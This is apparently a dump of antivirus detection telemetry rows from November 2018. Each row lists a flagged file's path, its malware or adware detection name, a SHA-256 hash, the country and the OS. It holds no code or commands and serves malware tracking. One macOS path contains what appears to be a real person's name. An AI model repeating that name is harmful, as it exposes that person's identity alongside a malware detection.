  Row(detection=Row(filename='maxxaudiocontrol.exe', filepath='F:\\Users\\X\\AppData\\Local\\Temp\\drp\\DP_Sounds_Realtek_13094\\drp\\FORCED\\NTx86\\7040\\MaxxAudioControl.exe', filesize=2912000, name='W32/Sality.AG.#M1.#R1'), hash='9350a0fc0253262229e6cc2cfbea6affb4c36f783b49a92245054c11d7a305c8', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:34:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-144813-71cd6e84', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c9a063d9\\AVSCAN-20181031-205810-8E73B4A7\\AVSCAN-20181101-144813-71CD6E84', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:48:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pconverter.02acb3d59660479fbf4faf53c0b97d85.exe', filepath='C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\38CZBVHE\\PConverter.02acb3d59660479fbf4faf53c0b97d85.exe', filesize=376000, name='PUA/MyWebSearch.Gen.#M300.#R6777'), hash='a36c690c41d2651fe6a2e5f9d785ac213521e3b62107bb5a7b6b4ee4372a5b75', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:CkZRKtaJ\\\\\\/kii1nyl.1', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T14:43:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='profiles.exe', filepath='C:\\Users\\X\\Thunder Network\\Mini_downloadlib\\ODAwMDA2MDA=\\Version_3_2_1_50\\Profiles\\Profiles.exe', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:58:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsc2FE7.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:25:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-124318-d14d89e8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-124250-B9F4BA52\\AVSCAN-20181101-124318-D14D89E8', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:43:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='start.exe', filepath='\\\\n5550\\kr-server\\廣羅\\kr-server\\server行政\\0管理部\\行政部\\工商萬用管理表格管理表格\\財物管理類\\start.exe', filesize=1536000, name='W32/Stanit.#M1.#R1'), hash='d8c5b569852657d54915af46e73dd4965fc900c429462157503f74d2c8930f4b', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:dZLJlmOScUes48KI.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T00:57:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='truckscale.exe', filepath='\\\\?\\C:\\123\\TruckScale.exe', filesize=64000, name='HEUR/APC.#M1.#R1'), hash='56df167b549390941f168cfcc0a6ff911cf9ee28999a64071409d32e9f0361d5', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:39:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-01T09:58:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='123f6cf0c4a0f197f9af6e6b26a803530204bc7f7faae0bdc88fb0c39a74f734', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\123F6CF0C4A0F197F9AF6E6B26A803530204BC7F7FAAE0BDC88FB0C39A74F734', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='123f6cf0c4a0f197f9af6e6b26a803530204bc7f7faae0bdc88fb0c39a74f734', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:12:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160158-1831d609', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_be284484\\AVSCAN-20181101-160130-149BA1CB\\AVSCAN-20181101-160158-1831D609', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:01:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T14:01:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-01T16:04:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='crack-corel-videostudio-x4.exe', filepath='D:\\Downloads\\Downloads\\Crack-Corel-VideoStudio-X4.exe', filesize=512000, name='TR/Dropper.MSIL.xtzvi.#M1.#R1'), hash='0741eff5f96e52fb7123481fb8e100b175f7cd440eb8b54c767bf5a338db60f6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T19:28:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T09:34:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-130747-855657ed', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_356b1c38\\AVSCAN-20181101-130537-7144654A\\AVSCAN-20181101-130747-855657ED', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T08:07:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa16008.34026\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa16008.34026\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T20:57:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\Setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T17:05:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='2f27e67e2c3834ca9129790a7a1c6155a1eb11f1c6d4cb3f3e521ed99462de26', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_11.10.2018-40.available\\Avira\\2F27E67E2C3834CA9129790A7A1C6155A1EB11F1C6D4CB3F3E521ED99462DE26', filesize=1984000, name='HEUR/AGEN.1034329.#M1.#R1'), hash='2f27e67e2c3834ca9129790a7a1c6155a1eb11f1c6d4cb3f3e521ed99462de26', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T10:50:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='steam_api_c.dll', filepath='C:\\chon\\steam_api_c.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='7cea36e5dfa494f024986632c183f2498cca22254c8de274076a89f13bb305ec', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:37:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='corel svg.exe', filepath='F:\\New folder\\Corel Draw 12\\Corel SVG\\Corel SVG.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T17:18:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-000452-64defeff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6c2d1c76\\AVSCAN-20181102-000435-62093130\\AVSCAN-20181102-000452-64DEFEFF', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:05:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='privacy', filepath='/Applications/Mac Tonic.app/Contents/PlugIns/Privacy.plugin/Contents/MacOS/Privacy', filesize=748000, name='OSX/GT32SupportGeeks.btuqv.#M0.#R0'), hash='4769980682ab8e7efcccff847a70944b55c079ecac65d03059a9924eab9ebe31', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T16:23:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Desktop\\Downloads\\Setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Desktop\\Downloads\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T19:23:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T08:27:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000a9061', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp000a9061', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:49:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\Setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T17:56:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered danel', filepath='C:\\Windows\\System32\\Tasks\\YAHOO! POWERED DANEL', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2d05dd7d3058be10c6b4fefc70b12237fa1f77f334a6797c8e40d9df95d4b012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:18:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='lpk.dll', filepath='\\?\\J:\\العاب\\AirXonix1\\lpk.dll', filesize=960000, name='TR/Nitol.blanu.#M1.#R1'), hash='5c2c510cceb95127c88dce74e7558d437240eb6bd5a252c729a950bf8f2f9608', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:45:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.620\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.620\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T21:14:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160339-f7fd8c93', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_20bba27a\\AVSCAN-20181101-160132-3B6207F7\\AVSCAN-20181101-160339-F7FD8C93', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:03:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='whmwahby.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\whMwahBY.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152406-4dd30afe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_642cd325\\AVSCAN-20181101-152303-41C8AB8B\\AVSCAN-20181101-152406-4DD30AFE', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='be458c71411a96a3c8b0e010203665e37b3ec2700f94c837e24d0cf7b63cb5e1', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:24:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152130-83adaf85', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-152130-83ADAF85', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:21:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-093445-8f18b6e4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-093445-8F18B6E4', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:34:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150052-964d90a8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150052-964D90A8', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:00:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='normativa tintolavanderia.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\TINTOLAVANDERIA\\NORMATIVA TINTOLAVANDERIA.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:14:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='superencontre.exe', filepath='C:\\Users\\X\\Documents\\jeux\\superencontre.exe', filesize=384000, name='HEUR/APC.#M1.#R1'), hash='b2e37e15e5a87138ec89400a74b48175f6c7731bda70e808ee26865713b56329', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:37:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150000-8c66b1d4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150000-8C66B1D4', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:00:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='prounstl.exe', filepath='E:\\Softwares\\Gagibite 61M\\Network\\Intel\\PRO1000\\Win32\\NDIS61\\PROUnstl.exe', filesize=368000, name='W32/Sality.AT.#M1.#R1'), hash='8a753fd74b70f884bc18915fd6ad16488c5ef7ee0adab0c84fcc9f41d9365ea2', metadata=Row(cmdline=None, country='LK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\SCIENTER\\RestManage\\RestManage.exe', parentsize=3473408, timestamp='2018-11-01T03:15:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='normativa.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\TERMOIDRAULICA\\CONDUTTORE DI IMPIANTI TERMICI\\NORMATIVA.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:14:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094415-fc45d27d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094415-FC45D27D', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:44:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150316-b1f1ce50', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150316-B1F1CE50', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:03:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='proyecto alondra                                   .scr', filepath='E:\\Proyecto Alondra                                   .scr', filesize=64000, name='W32/Sality.K.#M1.#R1'), hash='e562a79153316650e911a59240cf1949e94b5b45d5e72143edefd294716ab455', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:11:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='86bb0cdf3416b387a6e04679de5347aa754108e5425efc93c1868069806f5cda', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T07:14:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\kxgmzu3ff0o\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T19:07:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='ebc3c31328d3e062a4cae121b7ff8441a9beefe61fefaddd01a462789bb5fcb4', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:52:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150204-ac810eb7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_36c54126\\AVSCAN-20181101-145905-8A15D273\\AVSCAN-20181101-150204-AC810EB7', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:02:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bpreaccion                                   .scr', filepath='E:\\Proyecto\\BPreaccion                                   .scr', filesize=64000, name='W32/Sality.K.#M1.#R1'), hash='e562a79153316650e911a59240cf1949e94b5b45d5e72143edefd294716ab455', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:12:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='D:\\titip sek yo\\vol2\\instaler\\(D) CD v3_1VI\\Lan\\RealTek\\Setup.exe', filesize=256000, name='W32/Virut.Gen.#M1.#R1'), hash='c53def0da5663ee6911a7a6c16bee144e5691a383f497076593b43727a778697', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T19:03:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='upgradedownload.exe', filepath='\\\\?\\C:\\Users\\X\\Desktop\\Desktop\\Exmobile Software\\chat 3\\UpgradeDownload.exe', filesize=1536000, name='W32/Virut.Gen.#M1.#R1'), hash='ab15e9bc509d265560666e9663d7179f03ad0452e71c6d2c1eb75c9df0f03397', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:12:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\wvcsgkw24bt\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:49:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181104-210727-7c624c25', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-210727-7C624C25', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='398b9784731795a2a9159ae69dea840751d74fbe0f64b1e1929ea2fce6c6f138', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T20:07:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='2181a048-edd4-cd55-08af-b658faa884ab.exe', filepath='f:\\{ce56a4dc-db9d-f3bd-d50d-77aae02db775}\\2181a048-edd4-cd55-08af-b658faa884ab.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='889c34768a41011fe4497a0fec566df4a29ef04a0c49dabd8cd6c0c717c5dde7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T10:09:57Z'), dt=datetime.date(2018, 11, 4)),
